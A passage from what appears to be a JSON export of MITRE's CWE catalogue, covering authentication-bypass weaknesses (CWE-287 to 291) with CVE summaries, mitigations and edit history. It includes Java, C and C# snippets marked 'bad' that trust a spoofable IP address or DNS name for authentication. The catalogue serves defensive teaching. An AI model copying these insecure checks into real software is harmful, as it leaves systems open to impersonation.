\\"login_ok\\" parameter to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3421"},{"Reference":"CVE-2009-2382","Description":"admin script allows authentication bypass by setting a cookie value to \\"LOGGEDIN\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2382"},{"Reference":"CVE-2009-1048","Description":"VOIP product allows authentication bypass using 127.0.0.1 in the Host header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048"},{"Reference":"CVE-2009-2213","Description":"product uses default \\"Allow\\" action, instead of default deny, leading to authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-2168","Description":"chain: redirect without exit (CWE-698) leads to resultant authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2168"},{"Reference":"CVE-2009-3107","Description":"product does not restrict access to a listening port for a critical service, allowing authentication to be bypassed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3107"},{"Reference":"CVE-2009-1596","Description":"product does not properly implement a security-related configuration setting, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1596"},{"Reference":"CVE-2009-2422","Description":"authentication routine returns \\"nil\\" instead of \\"false\\" in some situations, allowing authentication bypass using an invalid username.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2422"},{"Reference":"CVE-2009-3232","Description":"authentication update script does not properly handle when admin does not select any authentication modules, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3232"},{"Reference":"CVE-2009-3231","Description":"use of LDAP authentication with anonymous binds causes empty password to result in successful authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3231"},{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Functional_Areas":{"Functional_Area":"Authentication"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Error"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":1,"Entry_Name":"Insufficient Authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"114"}},{"attr":{"@_CAPEC_ID":"115"}},{"attr":{"@_CAPEC_ID":"151"}},{"attr":{"@_CAPEC_ID":"194"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"593"}},{"attr":{"@_CAPEC_ID":"633"}},{"attr":{"@_CAPEC_ID":"650"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-237"}},{"attr":{"@_External_Reference_ID":"REF-238"}},{"attr":{"@_External_Reference_ID":"REF-239"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authentication&#34; Page 109"}}]},"Notes":{"Note":{"#text":"This can be resultant from SQL injection vulnerabilities and other issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Authentication Issues","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Authentication","attr":{"@_Date":"2009-01-12"}}]}},"288":{"attr":{"@_ID":"288","@_Name":"Authentication Bypass Using an Alternate Path or Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product requires authentication, but the product has an alternate path or channel that does not require authentication.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"420","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"425","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Architecture and Design","Note":"This is often seen in web applications that assume that access to a particular CGI program can only be obtained through a \\"front\\" screen, when the supporting programs are directly accessible. But this problem is not just in web apps."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1179","Description":"Router allows remote attackers to read system logs without authentication by directly connecting to the login screen and typing certain control characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1179"},{"Reference":"CVE-1999-1454","Description":"Attackers with physical access to the machine may bypass the password prompt by pressing the ESC (Escape) key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1454"},{"Reference":"CVE-1999-1077","Description":"OS allows local attackers to bypass the password protection of idled sessions via the programmer\'s switch or CMD-PWR keyboard sequence, which brings up a debugger that the attacker can use to disable the lock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1077"},{"Reference":"CVE-2003-0304","Description":"Direct request of installation file allows attacker to create administrator accounts.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0304"},{"Reference":"CVE-2002-0870","Description":"Attackers may gain additional privileges by directly requesting the web management URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0870"},{"Reference":"CVE-2002-0066","Description":"Bypass authentication via direct request to named pipe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066"},{"Reference":"CVE-2003-1035","Description":"User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass by Alternate Path/Channel"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"665"}}]},"Notes":{"Note":{"#text":"overlaps Unprotected Alternate Channel","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Modes_of_Introduction, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Authentication Bypass by Alternate Path/Channel","attr":{"@_Date":"2008-09-09"}}}},"289":{"attr":{"@_ID":"289","@_Name":"Authentication Bypass by Alternate Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0317","Description":"Protection mechanism that restricts URL access can be bypassed using URL encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0317"},{"Reference":"CVE-2004-0847","Description":"Bypass of authentication for files using \\"\\\\\\" (backslash) or \\"%5C\\" (encoded backslash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by alternate name"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"CWE More Specific"}]},"Notes":{"Note":[{"#text":"Overlaps equivalent encodings, canonicalization, authorization, multiple trailing slash, trailing space, mixed case, and other equivalence issues.","attr":{"@_Type":"Relationship"}},{"#text":"Alternate names are useful in data driven manipulation attacks, not just for authentication.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"290":{"attr":{"@_ID":"290","@_Name":"Authentication Bypass by Spoofing","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"This attack-focused weakness is caused by improperly implemented authentication schemes that are subject to spoofing attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"This weakness can allow an attacker to access resources which are not otherwise accessible without proper authentication."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code authenticates users.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String sourceIP = request.getRemoteAddr();if (sourceIP != null &amp;&amp; sourceIP.equals(APPROVED_IP)) {}","xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The authentication mechanism implemented relies on an IP address for source validation. If an attacker is able to spoof the IP, they may be able to bypass the authentication mechanism."},{"attr":{"@_Demonstrative_Example_ID":"DX-99"},"Intro_Text":"Both of these examples check if a request is from a trusted address before responding to the request.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort();if (isTrustedAddress(clientIPAddress) &amp; secretKey.equals(in)) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}],"Body_Text":"The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client."},{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &amp;myaddr, sizeof(struct in_addr), AF_INET);if (hp &amp;&amp; !strncmp(hp-&gt;h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-1048","Description":"VOIP product allows authentication bypass using 127.0.0.1 in the Host header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by spoofing"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"461"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"476"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"667"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Spoofing and Identification&#34;, Page 72"}}},"Notes":{"Note":{"#text":"This can be resultant from insufficient verification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"291":{"attr":{"@_ID":"291","@_Name":"Reliance on IP Address for Authentication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an IP address for authentication.","Extended_Description":"IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Access Control","Non-Repudiation"],"Impact":["Hide Activities","Gain Privileges or Assume Identity"],"Note":"Malicious users can fake authentication information, impersonating any IP address."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-99"},"Intro_Text":"Both of these examples check if a request is from a 